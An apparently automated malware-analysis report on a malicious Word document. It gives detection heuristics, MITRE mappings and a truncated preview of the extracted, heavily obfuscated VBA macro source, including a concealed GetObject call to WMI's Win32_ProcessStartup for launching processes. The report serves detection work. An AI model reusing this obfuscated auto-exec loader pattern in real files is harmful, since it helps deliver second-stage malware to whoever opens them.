Verdict: MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1204.002 Malicious File
The sample is identified as malicious by ClamAV and exhibits critical heuristic firings for an obfuscated auto-exec VBA loader. The VBA macros are heavily obfuscated, making it difficult to determine the exact payload, but the presence of GetObject and execution tokens strongly suggests it's designed to download and execute a second-stage payload. The legacy WordBasic and Excel 4.0 macro markers indicate older infection vectors are also present.
Heuristics (9)
- ClamAV: Doc.Downloader.00536d-6863518-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.00536d-6863518-0
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN: Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 72474 bytes |

SHA-256 of macros.bas: e8d736fae0387158054954c032f1276331a090fa09d4b99081c9d01aa7040be1

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "B62548"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "v8_3688"
Function M_783_()
F_556__8 = 10126874 - 161262929
q080__6 = 727373378 + C70__34_
Select Case t_056_3
Case 750005020
O79_27 = Chr(415394091 * Tan(k7_050_0))
l52207_1 = w_99_8
Case 559537746
o6_21512 = i730_61
t4364__ = I__21__8
Case 955038668
r06008 = 801240696
r4_53_ = w84354_
End Select
w030__ = 59971562 - 762566272
Q686_4 = 156782828 + c1560_9_
Select Case i_6388
Case 176592621
o_9___92 = Chr(607543274 * Tan(i9404404))
J__084_4 = c9322_17
Case 562858142
A94710__ = v339_054
u8761629 = H06135
Case 622733253
f34_197 = 960514666
N04_6_ = t79830
End Select
n9__51_ = 358044507 - 16010089
j0_53354 = 331835156 + R0__2275
Select Case B16__4_
Case 678883657
H9_760_ = Chr(845605139 * Tan(T12_54_8))
t0060056 = Y86__0_6
Case 382362700
h731__ = b54_497
q0588_5 = U_98838
Case 469170451
a60_0_ = 820119388
q326_2 = B028_368
End Select
d0_49___ = 709997633 - 649872911
T1618697 = 632619711 + v06115
Select Case Z538_678
Case 471257513
A__9_9_ = Chr(893440139 * Tan(c22_8294))
c0_08476 = v372_6
Case 175159228
V5761_3 = Z5_4_2_5
E03648 = f_12_8_
Case 304805539
Q_053_ = 904828995
h66377 = q4_3_389
End Select
i96__88 = 238478478 - 17093697
w252_48 = 150704895 + V9440_
Select Case Q___357
Case 573488131
v_73167 = Chr(85504504 * Tan(f30_7841))
N8_0069 = C0623469
Case 220636499
n9_0_34_ = B76926_
f_53343 = n2_165_
Case 655889770
o83__4 = 10106122
X2_8__ = V797_2
End Select
O300090 = 518141297 - 207938376
z8_6_62_ = 177168710 + j938_560
Select Case Z_37__5
Case 596926551
Z_3_49 = Chr(560888294 * Tan(T86689))
G0628_5 = o__8_4_
Case 961695573
T545_585 = d9__64
w_1_7__9 = i5775__
Case 168804481
i_1885_ = 132281634
I85__5_8 = a32_089
End Select
End Function
Function u95500(R2_0737, I36853)
On Error Resume Next
N1148_8 = 539788555 - 216109302
z_43___ = 250449147 + U_835152
Select Case i7_082
Case 8940392
T1706935 = Chr(660888057 * Tan(Z_6__271))
L6031829 = s7670_4
Case 203480121
k07_9_ = p60132
p7522_1 = A6_3__46
Case 143684932
z_9571_ = 216522482
O5513__8 = h5_953__
End Select
o69860_3 = 490953713 - 910322495
S_263_ = 369476737 + O_7___
Select Case R01_6_8
Case 692347740
E627_5_ = Chr(900133470 * Tan(u_33_88))
h8_7_3 = F_1802
Case 282639618
I__2__5 = f7_3_6_
z3_6495 = U139__36
Case 689976788
i99748 = 732930962
E9030520 = O_3___5
End Select
f2___0 = 982231257 - 684671356
S1_3__ = 524187826 + j716_611
Select Case J004_15
Case 531323053
D792_8_ = Chr(59374617 * Tan(m58_298))
Z_972060 = J7536_
Case 248552713
c79_62__ = H479__77
X8_1_7_ = F1_092
Case 265912190
J55_3_9_ = 729309960
P_54681 = D_3601_
End Select
Set I_10__1 = GetObject((Z8_84939 _
+ "winmgm" + X__3__) + (f52206_3 + "ts:Win" + G2_56_51) + "32_Proce" + "ssStartup")
o0_3_5 = 533943814 - 142260364
U305180 = 177187749 + i3_26_
Select Case m65____2
Case 721925268
s_1639 = Chr(972037181 * Tan(K1118_79))
p_296939 = f___2049
Case 824530677
U55_055 = N35_12
... (truncated)